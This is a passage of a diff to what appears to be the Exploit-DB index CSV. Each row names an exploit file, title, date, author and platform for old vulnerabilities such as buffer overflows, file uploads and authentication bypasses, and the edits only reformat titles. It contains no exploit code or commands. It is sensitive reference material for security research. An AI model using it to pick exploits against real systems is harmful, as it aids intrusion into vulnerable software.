Upload",2012-06-11,"Adrien Thierry",php,webapps,0 19057,platforms/php/webapps/19057.txt,"Wordpress drag and drop file upload 0.1 - Arbitrary File Upload Vulnerability",2012-06-11,"Adrien Thierry",php,webapps,0 19058,platforms/php/webapps/19058.txt,"Wordpress Custom Content Type Manager 0.9.5.13-pl Arbitrary File Upload Vulnerability",2012-06-11,"Adrien Thierry",php,webapps,0 -19059,platforms/php/webapps/19059.php,"Agora-Project 2.12.11 Arbitrary File Upload Vulnerability",2012-06-11,Misa3l,php,webapps,0 +19059,platforms/php/webapps/19059.php,"Agora-Project 2.12.11 - Arbitrary File Upload Vulnerability",2012-06-11,Misa3l,php,webapps,0 19060,platforms/php/webapps/19060.php,"TheBlog <= 2.0 - Multiple Vulnerabilities",2012-06-11,WhiteCollarGroup,php,webapps,0 19064,platforms/hardware/dos/19064.txt,"F5 BIG-IP Remote Root Authentication Bypass Vulnerability",2012-06-11,"Florent Daigniere",hardware,dos,0 19065,platforms/php/webapps/19065.rb,"Symantec Web Gateway 5.0.2.8 ipchange.php Command Injection",2012-06-12,metasploit,php,webapps,0 @@ -16535,7 +16535,7 @@ id,file,description,date,author,platform,type,port 19182,platforms/windows/dos/19182.txt,"XnView ECW Image Processing Heap Overflow",2012-06-16,"Francis Provencher",windows,dos,0 19183,platforms/windows/dos/19183.txt,"XnView FlashPix Image Processing Heap Overflow",2012-06-16,"Francis Provencher",windows,dos,0 19184,platforms/windows/dos/19184.pl,"Karafun Player 1.20.86 - (.m3u) Crash PoC",2012-06-16,Styxosaurus,windows,dos,0 -19185,platforms/hardware/webapps/19185.txt,"Huawei HG866 Authentication Bypass",2012-06-16,hkm,hardware,webapps,0 +19185,platforms/hardware/webapps/19185.txt,"Huawei HG866 - Authentication Bypass",2012-06-16,hkm,hardware,webapps,0 19186,platforms/windows/remote/19186.rb,"Microsoft XML Core Services MSXML Uninitialized Memory Corruption",2012-06-16,metasploit,windows,remote,0 19187,platforms/php/webapps/19187.txt,"Wordpress Automatic Plugin 2.0.3 - SQL Injection",2012-06-16,nick58,php,webapps,0 19188,platforms/php/webapps/19188.txt,"Nuked Klan SP CMS 4.5 - SQL Injection Vulnerability",2012-06-16,Vulnerability-Lab,php,webapps,0 @@ -16800,7 +16800,7 @@ id,file,description,date,author,platform,type,port 19465,platforms/linux/local/19465.c,"RedHat Linux <= 6.0, Slackware Linux <= 4.0 Termcap tgetent() Buffer Overflow (2)",1999-08-18,sk8,linux,local,0 19466,platforms/multiple/remote/19466.txt,"Hughes Technologies Mini SQL (mSQL) 2.0/2.0.10 Vulnerability",1999-08-18,"Gregory Duchemin",multiple,remote,0 19467,platforms/linux/local/19467.c,"GNU glibc 2.1/2.1.1 -6 pt_chown Vulnerability",1999-08-23,"Michal Zalewski",linux,local,0 -19468,platforms/windows/remote/19468.txt,"Microsoft Internet Explorer 5.0 ActiveX ""Object for constructing type libraries for scriptlets"" Vulnerability",1999-08-21,"Georgi Guninski",windows,remote,0 +19468,platforms/windows/remote/19468.txt,"Microsoft Internet Explorer 5.0 - ActiveX ""Object for constructing type libraries for scriptlets"" Vulnerability",1999-08-21,"Georgi Guninski",windows,remote,0 19469,platforms/linux/local/19469.c,"RedHat Linux 4.2/5.2/6.0,S.u.S.E. Linux 6.0/6.1 Cron Buffer Overflow Vulnerability (1)",1999-08-30,Akke,linux,local,0 19470,platforms/linux/local/19470.c,"RedHat Linux 4.2/5.2/6.0,S.u.S.E. Linux 6.0/6.1 Cron Buffer Overflow Vulnerability (2)",1999-08-25,jbowie,linux,local,0 19471,platforms/windows/dos/19471.html,"Microsoft Internet Explorer 5.0 HTML Form Control DoS",1999-08-27,"Neon Bunny",windows,dos,0 @@ -16819,7 +16819,7 @@ id,file,description,date,author,platform,type,port 19484,platforms/windows/remote/19484.rb,"HP Data Protector Create New Folder Buffer Overflow",2012-07-01,metasploit,windows,remote,3817 19485,platforms/linux/local/19485.c,"Martin Stover Mars NWE 0.99 - Buffer Overflow Vulnerabilities",1999-08-31,"Przemyslaw Frasunek",linux,local,0 19486,platforms/windows/remote/19486.c,"Netscape Communicator 4.06/4.5/4.6/4.51/4.61 EMBED Buffer Overflow Vulnerability",1999-09-02,"R00t Zer0",windows,remote,0 -19487,platforms/windows/remote/19487.txt,"Microsoft Internet Explorer 4.0/5.0 ActiveX ""Eyedog"" Vulnerability",1999-08-21,"Shane Hird's",windows,remote,0 +19487,platforms/windows/remote/19487.txt,"Microsoft Internet Explorer 4.0/5.0 - ActiveX ""Eyedog"" Vulnerability",1999-08-21,"Shane Hird's",windows,remote,0 19488,platforms/bsd/local/19488.c,"FreeBSD <= 5.0,NetBSD <= 1.4.2,OpenBSD <= 2.7 setsockopt() DoS",1999-09-05,"L. Sassaman",bsd,local,0 19489,platforms/windows/dos/19489.txt,"Microsoft Windows NT 4.0 DCOM Server Vulnerability",1999-09-08,Mnemonix,windows,dos,0 19490,platforms/windows/remote/19490.txt,"Microsoft Internet Explorer 4.0.1/5.0 Import/Export Favorites Vulnerability",1999-09-10,"Georgi Guninski",windows,remote,0 @@ -16842,11 +16842,11 @@ id,file,description,date,author,platform,type,port 19507,platforms/solaris/remote/19507.txt,"Solaris <= 7.0 Recursive mutex_enter Panic Vulnerability",1999-09-23,"David Brumley",solaris,remote,0 19508,platforms/linux/local/19508.sh,"S.u.S.E. Linux 6.2 sscw HOME Environment Variable Buffer Overflow Vulnerability",1999-09-23,"Brock Tellier",linux,local,0 19509,platforms/solaris/local/19509.sh,"Solaris <= 2.6 Profiling File Creation Vulnerability",1999-09-22,"Steve Mynott",solaris,local,0 -19510,platforms/linux/local/19510.pl,"SSH Communications Security SSH 1.2.27 Authentication Socket File Creation Vulnerability",1999-09-17,"Tymm Twillman",linux,local,0 +19510,platforms/linux/local/19510.pl,"SSH Communications Security SSH 1.2.27 - Authentication Socket File Creation Vulnerability",1999-09-17,"Tymm Twillman",linux,local,0 19511,platforms/linux/local/19511.c,"Knox Software Arkeia 4.0 Backup Local Overflow",1999-09-26,"Brock Tellier",linux,local,0 19512,platforms/linux/local/19512.sh,"Mandriva Linux Mandrake 6.0,Gnome Libs 1.0.8 espeaker - Local Buffer Overflow",1999-09-26,"Brock Tellier",linux,local,0 19513,platforms/hardware/remote/19513.txt,"Eicon Networks DIVA LAN ISDN Modem 1.0 Release 2.5/1.0/2.0 DoS",1999-09-27,"Bjorn Stickler",hardware,remote,0 -19514,platforms/windows/remote/19514.txt,"Adobe Acrobat ActiveX Control 1.3.188 ActiveX Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0 +19514,platforms/windows/remote/19514.txt,"Adobe Acrobat ActiveX Control 1.3.188 - ActiveX Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0 19515,platforms/windows/remote/19515.txt,"Microsoft Internet Explorer 4.0 for Windows 95/Windows NT 4 Setupctl ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0 19516,platforms/windows/local/19516.txt,"Microsoft MSN Messenger Service 1.0 Setup BBS ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,local,0 19517,platforms/linux/local/19517.pl,"Emesene 2.12.5 Password Disclosure",2012-07-01,"Daniel Godoy",linux,local,0 @@ -16897,7 +16897,7 @@ id,file,description,date,author,platform,type,port 19564,platforms/bsd/dos/19564.c,"Axent Raptor 6.0 - Denial of Service Vulnerability",1999-10-21,MSG.Net,bsd,dos,0 19565,platforms/linux/local/19565.sh,"S.u.S.E. Linux 6.1/6.2 cwdtools Vulnerabilities",1999-10-22,"Brock Tellier",linux,local,0 19566,platforms/windows/remote/19566.c,"Omnicron OmniHTTPD 1.1/2.4 Pro Buffer Overflow Vulnerability",1999-10-22,UNYUN,windows,remote,0 -19567,platforms/linux/remote/19567.txt,"National Science Foundation Squid Web Proxy 1.0/1.1/2.1 Authentication Failure",1999-10-25,"Oezguer Kesim",linux,remote,0 +19567,platforms/linux/remote/19567.txt,"National Science Foundation Squid Web Proxy 1.0/1.1/2.1 - Authentication Failure",1999-10-25,"Oezguer Kesim",linux,remote,0 19568,platforms/windows/remote/19568.txt,"pacific software url live! 1.0 - Directory Traversal Vulnerability",1999-10-28,UNYUN,windows,remote,0 19569,platforms/windows/dos/19569.pl,"WFTPD 2.34/2.40/3.0 - Remote Buffer Overflow Vulnerability (1)",1999-10-28,"Alberto Soli",windows,dos,0 19570,platforms/windows/remote/19570.txt,"WFTPD 2.34/2.40/3.0 - Remote Buffer Overflow Vulnerability (2)",1999-11-04,"Alberto Solino",windows,remote,0 @@ -16931,7 +16931,7 @@ id,file,description,date,author,platform,type,port 19600,platforms/php/webapps/19600.txt,"CLscript CMS 3.0 - Multiple Vulnerabilities",2012-07-05,Vulnerability-Lab,php,webapps,0 19601,platforms/windows/remote/19601.txt,"etype eserv 2.50 - Directory Traversal Vulnerability",1999-11-04,"Ussr Labs",windows,remote,0 19602,platforms/linux/local/19602.c,"Eric Allman Sendmail 8.8.x - Socket Hijack Vulnerability",1999-11-05,"Michal Zalewski",linux,local,0 -19603,platforms/windows/remote/19603.txt,"Microsoft Internet Explorer 4.x/5.0,Outlook 2000 0/98 0/Express 4.x ActiveX CAB File Execution",1999-11-08,Mukund,windows,remote,0 +19603,platforms/windows/remote/19603.txt,"Microsoft Internet Explorer 4.x/5.0,Outlook 2000 0/98 0/Express 4.x - ActiveX CAB File Execution",1999-11-08,Mukund,windows,remote,0 19605,platforms/linux/dos/19605.c,"Linux Kernel - fs/eventpoll.c Local Denial of Service",2012-07-05,"Yurij M. Plotnikov",linux,dos,0 19607,platforms/windows/remote/19607.c,"Windows 95/98 UNC Buffer Overflow Vulnerability (1)",1999-11-09,UNYUN,windows,remote,0 19608,platforms/windows/remote/19608.c,"Windows 95/98 UNC Buffer Overflow Vulnerability (2)",1999-11-09,UNYUN,windows,remote,0 @@ -17043,7 +17043,7 @@ id,file,description,date,author,platform,type,port 19715,platforms/php/webapps/19715.txt,"WordPress WP-Predict Plugin 1.0 - Blind SQL Injection",2012-07-10,"Chris Kellum",php,webapps,0 19716,platforms/windows/dos/19716.txt,"Checkpoint Abra - Multiple Vulnerabilities",2012-07-10,"Andrey Komarov",windows,dos,0 19717,platforms/java/remote/19717.rb,"Java Applet Field Bytecode Verifier Cache Remote Code Execution",2012-07-11,metasploit,java,remote,0 -19718,platforms/windows/remote/19718.rb,"AdminStudio LaunchHelp.dll ActiveX Arbitrary Code Execution",2012-07-11,metasploit,windows,remote,0 +19718,platforms/windows/remote/19718.rb,"AdminStudio - LaunchHelp.dll ActiveX Arbitrary Code Execution",2012-07-11,metasploit,windows,remote,0 19719,platforms/windows/remote/19719.txt,"Microsoft Internet Explorer 4.0/4.0.1/5.0/5.0.1/5.5 preview Security Zone Settings Lag Vulnerability",2000-01-07,"Georgi Guninski",windows,remote,0 19720,platforms/windows/dos/19720.c,"NullSoft Winamp 2.10 Playlist Vulnerability",2000-01-10,"Steve Fewer",windows,dos,0 19721,platforms/multiple/local/19721.txt,"MySQL 3.22.27/3.22.29/3.23.8 GRANT Global Password Changing Vulnerability",2000-02-15,"Viktor Fougstedt",multiple,local,0 @@ -17118,7 +17118,7 @@ id,file,description,date,author,platform,type,port 19794,platforms/linux/local/19794.txt,"Oracle8i Standard Edition 8.1.5 for Linux Installer Vulnerability",2000-03-05,"Keyser Soze",linux,local,0 19795,platforms/cgi/remote/19795.txt,"Caldera OpenLinux 2.3 - rpm_query CGI Vulnerability",2000-03-05,harikiri,cgi,remote,0 19796,platforms/multiple/local/19796.c,"Matt Kimball and Roger Wolff mtr 0.28/0.41 / Turbolinux 3.5 b2/4.2/4.4/6.0 mtr Vulnerability (2)",2000-03-03,"Babcia Padlina",multiple,local,0 -19797,platforms/unix/remote/19797.txt,"Sun StarOffice 5.1 Arbitrary File Read Vulnerability",2000-03-09,"Vanja Hrustic",unix,remote,0 +19797,platforms/unix/remote/19797.txt,"Sun StarOffice 5.1 - Arbitrary File Read Vulnerability",2000-03-09,"Vanja Hrustic",unix,remote,0 19798,platforms/windows/local/19798.txt,"Microsoft Windows NT 4.0 User Shell Folders Vulnerability",2000-03-09,anonymous,windows,local,0 19799,platforms/windows/dos/19799.txt,"Windows 2000/95/98/ME/NT 3.5.x/Enterprise Server 4.0/Terminal Server 4.0/Workstation 4.0 Microsoft DoS Device Name DoS",2000-03-04,anonymous,windows,dos,0 19800,platforms/multiple/remote/19800.c,"Check Point Software Firewall-1 3.0/1 4.0,Cisco PIX Firewall 4.x/5.x ""ALG"" Client Vulnerability",2000-03-10,"Dug Song",multiple,remote,0 @@ -17184,7 +17184,7 @@ id,file,description,date,author,platform,type,port 19864,platforms/php/webapps/19864.txt,"VamCart 0.9 CMS - Multiple Vulnerabilities",2012-07-16,Vulnerability-Lab,php,webapps,0 19865,platforms/php/webapps/19865.txt,"PBBoard 2.1.4 CMS - Multiple Vulnerabilities",2012-07-16,Vulnerability-Lab,php,webapps,0 19866,platforms/windows/dos/19866.pl,"DomsHttpd <= 1.0 - Remote Denial of Service Exploit",2012-07-16,"Jean Pascal Pereira",windows,dos,0 -19867,platforms/linux/local/19867.txt,"S.u.S.E. Linux 6.x Arbitrary File Deletion Vulnerability",2000-04-21,Peter_M,linux,local,0 +19867,platforms/linux/local/19867.txt,"S.u.S.E. Linux 6.x - Arbitrary File Deletion Vulnerability",2000-04-21,Peter_M,linux,local,0 19868,platforms/linux/remote/19868.c,"LCDProc 0.4 - Buffer Overflow Vulnerability",2000-04-23,"Andrew Hobgood",linux,remote,0 19869,platforms/linux/dos/19869.txt,"Qualcomm qpopper 2.53/3.0,RedHat imap 4.5 -4,UoW imap 4.5 popd Lock File DoS",2000-04-19,"Alex Mottram",linux,dos,0 19870,platforms/linux/local/19870.pl,"CVS 1.10.7 - Local Denial of Service Vulnerability",2000-04-23,"Michal Szymanski",linux,local,0 @@ -17237,7 +17237,7 @@ id,file,description,date,author,platform,type,port 19918,platforms/multiple/remote/19918.c,"Stake AntiSniff 1.0.1/Researchers Version 1.0 - DNS Overflow Vulnerability (3)",2000-05-16,L0pht,multiple,remote,0 19919,platforms/hardware/remote/19919.c,"Cisco 7xx Series Router DoS Vulnerability",1999-03-11,Tiz.Telesup,hardware,remote,0 19920,platforms/multiple/dos/19920.c,"Computalynx CProxy Server 3.3 SP2 - Buffer Overflow DoS Vulnerability",2000-05-16,"HaCk-13 TeaM",multiple,dos,0 -19921,platforms/cgi/remote/19921.txt,"Matt Kruse Calendar Script 2.2 Arbitrary Command Execution",2000-05-16,suid,cgi,remote,0 +19921,platforms/cgi/remote/19921.txt,"Matt Kruse Calendar Script 2.2 - Arbitrary Command Execution",2000-05-16,suid,cgi,remote,0 19922,platforms/windows/remote/19922.pl,"Internet Security Systems ICECap Manager 2.0.23 Default Username and Password",2000-05-17,"rain forest puppy",windows,remote,0 19923,platforms/hardware/remote/19923.txt,"Cayman 3220-H DSL Router 1.0/GatorSurf 5.3 DoS Vulnerability",2000-05-17,cassius,hardware,remote,0 19924,platforms/bsd/remote/19924.c,"Cygnus Network Security 4.0/KerbNet 5.0,MIT Kerberos 4/5,RedHat 6.2 Compatibility krb_rd_req() Buffer Overflow (1)",2000-05-16,duke,bsd,remote,0 @@ -17320,7 +17320,7 @@ id,file,description,date,author,platform,type,port 20005,platforms/windows/remote/20005.c,"Windows NT 4.0 - Remote Registry Request DoS Vulnerability (1)",2000-06-08,"Renaud Deraison",windows,remote,0 20006,platforms/windows/remote/20006.nasl,"Windows NT 4.0 - Remote Registry Request DoS Vulnerability (2)",2000-06-08,"Renaud Deraison",windows,remote,0 20007,platforms/cgi/remote/20007.c,"3R Soft MailStudio 2000 2.0 userreg.cgi Arbitrary Command Execution",2000-04-24,fygrave,cgi,remote,0 -20008,platforms/cgi/remote/20008.txt,"3R Soft MailStudio 2000 2.0 Arbitrary File Access",2000-06-09,s0ftpr0ject,cgi,remote,0 +20008,platforms/cgi/remote/20008.txt,"3R Soft MailStudio 2000 2.0 - Arbitrary File Access",2000-06-09,s0ftpr0ject,cgi,remote,0 20009,platforms/linux/remote/20009.py,"atmail email server appliance 6.4 - Stored XSS - CSRF - rce",2012-07-21,muts,linux,remote,0 20010,platforms/php/webapps/20010.txt,"X-Cart Gold 4.5 (products_map.php symb parameter) XSS Vulnerability",2012-07-21,muts,php,webapps,0 20011,platforms/windows/webapps/20011.js,"solarwinds orion network performance monitor 10.2.2 - Multiple Vulnerabilities",2012-07-21,muts,windows,webapps,0 @@ -17400,7 +17400,7 @@ id,file,description,date,author,platform,type,port 20088,platforms/linux/remote/20088.py,"Symantec Web Gateway 5.0.3.18 pbcontrol.php ROOT RCE Exploit",2012-07-24,muts,linux,remote,0 20089,platforms/windows/remote/20089.txt,"Microsoft IIS 4.0/5.0 Source Fragment Disclosure Vulnerability",2000-07-17,"Zuo Lei",windows,remote,0 20090,platforms/hardware/remote/20090.txt,"HP JetDirect J3111A Invalid FTP Command DoS Vulnerability",2000-07-19,"Peter Grundl",hardware,remote,0 -20091,platforms/multiple/remote/20091.txt,"Stalker Communigate Pro 3.2.4 Arbitrary File Read Vulnerability",2000-04-03,S21Sec,multiple,remote,0 +20091,platforms/multiple/remote/20091.txt,"Stalker Communigate Pro 3.2.4 - Arbitrary File Read Vulnerability",2000-04-03,S21Sec,multiple,remote,0 20092,platforms/cgi/local/20092.txt,"Sean MacGuire Big Brother 1.0/1.3/1.4 CGI File Creation Vulnerability",2001-06-11,xternal,cgi,local,0 20093,platforms/linux/local/20093.c,"Stanley T. Shebs Xconq 7.2.2 - Buffer Overflow Vulnerabilities in xconq",2000-06-22,V9,linux,local,0 20094,platforms/windows/dos/20094.txt,"NullSoft Winamp 2.6 4 M3U Playlist Buffer Overflow Vulnerability",2001-01-17,"Pauli Ojanpera",windows,dos,0 @@ -17484,7 +17484,7 @@ id,file,description,date,author,platform,type,port 20180,platforms/windows/remote/20180.c,"RobTex Viking Server 1.0.6 Build 355 - Buffer Overflow Vulnerability",2000-08-28,wildcoyote,windows,remote,0 20181,platforms/multiple/remote/20181.txt,"Kerberos 4 4.0/5 5.0 KDC Spoofing Vulnerability",2000-08-28,"Dug Song",multiple,remote,0 20182,platforms/windows/remote/20182.txt,"Ipswitch IMail 6.x File Attachment Vulnerability",2000-08-30,Timescape,windows,remote,0 -20183,platforms/cgi/remote/20183.pl,"GWScripts News Publisher 1.0 author.file Write Vulnerability",2000-08-29,n30,cgi,remote,0 +20183,platforms/cgi/remote/20183.pl,"GWScripts News Publisher 1.0 - author.file Write Vulnerability",2000-08-29,n30,cgi,remote,0 20184,platforms/windows/remote/20184.txt,"eEye Digital Security IRIS 1.0.1,SpyNet CaptureNet 3.0.12 - Buffer Overflow",2000-08-31,"Ussr Labs",windows,remote,0 20185,platforms/linux/local/20185.c,"RedHat 6 glibc/locale Subsystem Format String",2000-09-06,warning3,linux,local,0 20186,platforms/solaris/local/20186.c,"Solaris 2.6/7.0 /locale Subsystem Format String",2000-11-02,warning3,solaris,local,0 @@ -17517,7 +17517,7 @@ id,file,description,date,author,platform,type,port 20215,platforms/multiple/remote/20215.pl,"Check Point Software Firewall-1 3.0/1 4.0/1 4.1 Session Agent Dictionary Attack (1)",2000-08-15,"Nelson Brito",multiple,remote,0 20216,platforms/multiple/remote/20216.sh,"Check Point Software Firewall-1 3.0/1 4.0/1 4.1 Session Agent Dictionary Attack (2)",2000-10-01,"Gregory Duchemin",multiple,remote,0 20217,platforms/linux/local/20217.c,"RedHat Linux 6.1 i386 Tmpwatch Recursive Write DoS Vulnerability",2000-09-09,"zenith parsec",linux,local,0 -20218,platforms/cgi/remote/20218.txt,"YaBB 9.1.2000 Arbitrary File Read Vulnerability",2000-09-10,pestilence,cgi,remote,0 +20218,platforms/cgi/remote/20218.txt,"YaBB 9.1.2000 - Arbitrary File Read Vulnerability",2000-09-10,pestilence,cgi,remote,0 20219,platforms/windows/dos/20219.txt,"WebTV for Windows 98/ME DoS Vulnerability",2000-09-12,Smashstack,windows,dos,0 20220,platforms/linux/remote/20220.txt,"Mandrake 6.1/7.0/7.1 /perl http Directory Disclosure Vulnerability",2000-09-11,anonymous,linux,remote,0 20221,platforms/windows/dos/20221.pl,"Jack De Winter WinSMTP 1.6 f/2.0 - Buffer Overflow Vulnerability",2000-09-11,"Guido Bakker",windows,dos,0 @@ -17598,7 +17598,7 @@ id,file,description,date,author,platform,type,port 20300,platforms/windows/remote/20300.c,"Microsoft IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability (3)",2000-10-17,zipo,windows,remote,0 20301,platforms/windows/remote/20301.php,"Microsoft IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability (4)",2000-10-17,BoloTron,windows,remote,0 20302,platforms/windows/remote/20302.pl,"Microsoft IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability (5)",2000-10-17,"Andrea Spabam",windows,remote,0 -20303,platforms/cgi/remote/20303.pl,"Oatmeal Studios Mail File 1.10 Arbitrary File Disclosure Vulnerability",2000-10-11,"Dirk Brockhausen",cgi,remote,0 +20303,platforms/cgi/remote/20303.pl,"Oatmeal Studios Mail File 1.10 - Arbitrary File Disclosure Vulnerability",2000-10-11,"Dirk Brockhausen",cgi,remote,0 20304,platforms/windows/dos/20304.txt,"Omnicron OmniHTTPD 1.1/2.0 Alpha 1 visiadmin.exe Denial of Service Vulnerability",1999-06-05,"Valentin Perelogin",windows,dos,0 20305,platforms/windows/remote/20305.txt,"Microsoft Site Server 2.0 with IIS 4.0 - File Upload Vulnerability",1999-01-30,Mnemonix,windows,remote,0 20306,platforms/windows/remote/20306.html,"Microsoft Virtual Machine Arbitrary Java Codebase Execution Vulnerability",2000-10-18,"Georgi Guninski",windows,remote,0 @@ -17609,15 +17609,15 @@ id,file,description,date,author,platform,type,port 20311,platforms/windows/dos/20311.c,"Avirt Mail 4.0/4.2 - 'Mail From:' and 'Rcpt to:' DoS Vulnerability",2000-10-23,Martin,windows,dos,0 20312,platforms/linux/local/20312.c,"Oracle Internet Directory 2.0.6 oidldap Vulnerability",2000-10-18,"Juan Manuel Pascual Escribá",linux,local,0 20313,platforms/multiple/remote/20313.txt,"Allaire JRun 3 - Directory Disclosure Vulnerability",2000-10-23,"Foundstone Labs",multiple,remote,0 -20314,platforms/multiple/remote/20314.txt,"Allaire JRun 2.3 Arbitrary Code Execution Vulnerability",2000-10-23,"Foundstone Labs",multiple,remote,0 +20314,platforms/multiple/remote/20314.txt,"Allaire JRun 2.3 - Arbitrary Code Execution Vulnerability",2000-10-23,"Foundstone Labs",multiple,remote,0 20315,platforms/multiple/remote/20315.txt,"Allaire JRun 2.3 File Source Code Disclosure Vulnerability",2000-10-23,"Foundstone Labs",multiple,remote,0 -20316,platforms/linux/local/20316.txt,"BSD lpr 0.54 -4 Arbitrary Command Execution Vulnerability",2000-10-20,"zenith parsec",linux,local,0 +20316,platforms/linux/local/20316.txt,"BSD lpr 0.54 -4 - Arbitrary Command Execution Vulnerability",2000-10-20,"zenith parsec",linux,local,0 20317,platforms/windows/local/20317.c,"Microsoft Windows NT 4.0 MSIEXEC Registry Permissions Vulnerability",2000-10-23,Mnemonix,windows,local,0 20318,platforms/windows/remote/20318.txt,"Oracle Business Transaction Management Server 12.1.0.2.7 FlashTunnelService WriteToFile Message RCE",2012-08-07,rgod,windows,remote,0 20319,platforms/windows/remote/20319.txt,"Oracle Business Transaction Management Server 12.1.0.2.7 FlashTunnelService Remote File Deletion",2012-08-07,rgod,windows,remote,0 20320,platforms/windows/webapps/20320.txt,"Zoho BugTracker Multiple Stored XSS Vulnerabilities",2012-08-07,LiquidWorm,windows,webapps,0 20321,platforms/windows/remote/20321.rb,"Ubisoft uplay 2.0.3 Active X Control Arbitrary Code Execution",2012-08-08,metasploit,windows,remote,0 -20322,platforms/multiple/remote/20322.html,"Sun HotJava Browser 3 Arbitrary DOM Access Vulnerability",2000-10-25,"Georgi Guninski",multiple,remote,0 +20322,platforms/multiple/remote/20322.html,"Sun HotJava Browser 3 - Arbitrary DOM Access Vulnerability",2000-10-25,"Georgi Guninski",multiple,remote,0 20323,platforms/hardware/remote/20323.txt,"Cisco IOS 12 Software ""?/"" HTTP Request DoS Vulnerability",2000-10-25,"Alberto Solino",hardware,remote,0 20324,platforms/windows/remote/20324.txt,"iPlanet Certificate Management System 4.2 - Directory Traversal",2000-10-25,CORE-SDI,windows,remote,0 20325,platforms/windows/remote/20325.txt,"Netscape Directory Server 4.12 - Directory Server Directory Traversal Vulnerability",2000-10-25,CORE-SDI,windows,remote,0 @@ -17692,14 +17692,14 @@ id,file,description,date,author,platform,type,port 20395,platforms/unix/remote/20395.c,"BNC 2.2.4/2.4.6/2.4.8 IRC Proxy Buffer Overflow Vulnerability (2)",1998-12-26,"jamez and dumped",unix,remote,0 20396,platforms/hp-ux/local/20396.sh,"HP-UX 10.x/11.x Aserver PATH Vulnerability",1998-10-18,Loneguard,hp-ux,local,0 20397,platforms/cgi/remote/20397.txt,"McMurtrey/Whitaker & Associates Cart32 3.0/3.1/3.5 Path Disclosure Vulnerability",2000-11-10,sozni,cgi,remote,0 -20398,platforms/php/webapps/20398.txt,"MobileCartly 1.0 Arbitrary File Deletion Vulnerability",2012-08-10,GoLd_M,php,webapps,0 +20398,platforms/php/webapps/20398.txt,"MobileCartly 1.0 - Arbitrary File Deletion Vulnerability",2012-08-10,GoLd_M,php,webapps,0 20399,platforms/windows/remote/20399.html,"Microsoft Indexing Services for Windows 2000 File Verification Vulnerability",2000-11-10,"Georgi Guninski",windows,remote,0 20400,platforms/cgi/remote/20400.txt,"McMurtrey/Whitaker & Associates Cart32 3.0/3.1/3.5 DoS Vulnerability",2000-11-10,sozni,cgi,remote,0 20401,platforms/windows/local/20401.txt,"Computer Associates InoculateIT 4.53 Microsoft Exchange Agent Vulnerability",2000-11-10,"Hugo Caye",windows,local,0 20402,platforms/linux/local/20402.sh,"Linux modutils 2.3.9 modprobe Arbitrary Command Execution Vulnerability",2000-11-12,"Michal Zalewski",linux,local,0 20403,platforms/windows/remote/20403.txt,"Small HTTP server 2.0 1 Non-Existent File DoS Vulnerability",2000-11-14,"403-security team",windows,remote,0 20404,platforms/beos/remote/20404.txt,"Joe Kloss RobinHood 1.1 - Buffer Overflow Vulnerability",2000-11-14,Vort-fu,beos,remote,0 -20405,platforms/cgi/remote/20405.pl,"DCForum 1-6 Arbitrary File Disclosure Vulnerability",2000-11-14,steeLe,cgi,remote,0 +20405,platforms/cgi/remote/20405.pl,"DCForum 1-6 - Arbitrary File Disclosure Vulnerability",2000-11-14,steeLe,cgi,remote,0 20406,platforms/multiple/remote/20406.txt,"RealServer 5.0/6.0/7.0 Memory Contents Disclosure Vulnerability",2000-11-16,CORE-SDI,multiple,remote,0 20407,platforms/windows/local/20407.c,"NetcPlus SmartServer3 3.75 Weak Encryption Vulnerability",2000-11-18,"Steven Alexander",windows,local,0 20408,platforms/cgi/remote/20408.txt,"Markus Triska CGIForum 1.0 - ""thesection"" Directory Traversal Vulnerability",2000-11-20,zorgon,cgi,remote,0 @@ -17714,7 +17714,7 @@ id,file,description,date,author,platform,type,port 20418,platforms/solaris/local/20418.txt,"Solaris 10 Patch 137097-01 Symlink Attack Privilege Escalation",2012-08-11,"Larry Cashdollar",solaris,local,0 20419,platforms/php/webapps/20419.txt,"Flynax General Classifieds 4.0 CMS - Multiple Vulnerabilities",2012-08-11,Vulnerability-Lab,php,webapps,0 20421,platforms/php/webapps/20421.txt,"ProQuiz 2.0.2 - Multiple Vulnerabilities",2012-08-11,L0n3ly-H34rT,php,webapps,0 -20422,platforms/php/webapps/20422.txt,"MobileCartly 1.0 Arbitrary File Write Vulnerability",2012-08-10,"Yakir Wizman",php,webapps,0 +20422,platforms/php/webapps/20422.txt,"MobileCartly 1.0 - Arbitrary File Write Vulnerability",2012-08-10,"Yakir Wizman",php,webapps,0 20423,platforms/cgi/remote/20423.txt,"NCSA httpd-campas 1.2 sample script Vulnerability",1997-07-15,"Francisco Torres",cgi,remote,0 20424,platforms/windows/remote/20424.txt,"Microsoft Windows Media Player 7.0 - (.wms) Arbitrary Script Vulnerability",2000-11-22,"Sandro Gauci",windows,remote,0 20425,platforms/multiple/remote/20425.pl,"Microsys CyberPatrol 4.0 4.003/4.0 4.005 Insecure Registration Vulnerability",2000-11-22,"Joey Maier",multiple,remote,0 @@ -17723,7 +17723,7 @@ id,file,description,date,author,platform,type,port 20428,platforms/php/webapps/20428.txt,"Phorum 3.x PHP Configuration Disclosure Vulnerability",2000-11-23,"Joao Gouveia",php,webapps,0 20429,platforms/jsp/remote/20429.txt,"Caucho Technology Resin 1.2 JSP Source Disclosure Vulnerability",2000-11-23,benjurry,jsp,remote,0 20430,platforms/cgi/remote/20430.txt,"Info2www 1.0/1.1 CGI Input Handling Vulnerability",1998-03-03,"Niall Smart",cgi,remote,0 -20431,platforms/php/webapps/20431.txt,"Phorum 3.x Arbitrary File Read Vulnerability",2000-11-24,"Joao Gouveia",php,webapps,0 +20431,platforms/php/webapps/20431.txt,"Phorum 3.x - Arbitrary File Read Vulnerability",2000-11-24,"Joao Gouveia",php,webapps,0 20432,platforms/windows/local/20432.txt,"Network Associates WebShield SMTP 4.5 Invalid Outgoing Recipient Field DoS Vulnerability",2000-11-23,"Jari Helenius",windows,local,0 20433,platforms/cgi/remote/20433.txt,"CGI City CC Whois 1.0 Metacharacter Vulnerability",1999-11-09,"Cody T. - hhp",cgi,remote,0 20434,platforms/cgi/remote/20434.txt,"Miva htmlscript 2.x - Directory Traversal Vulnerability",1998-01-26,"Dennis Moore",cgi,remote,0 @@ -17780,13 +17780,13 @@ id,file,description,date,author,platform,type,port 20488,platforms/windows/remote/20488.txt,"MetaProducts Offline Explorer 1.x File System Disclosure 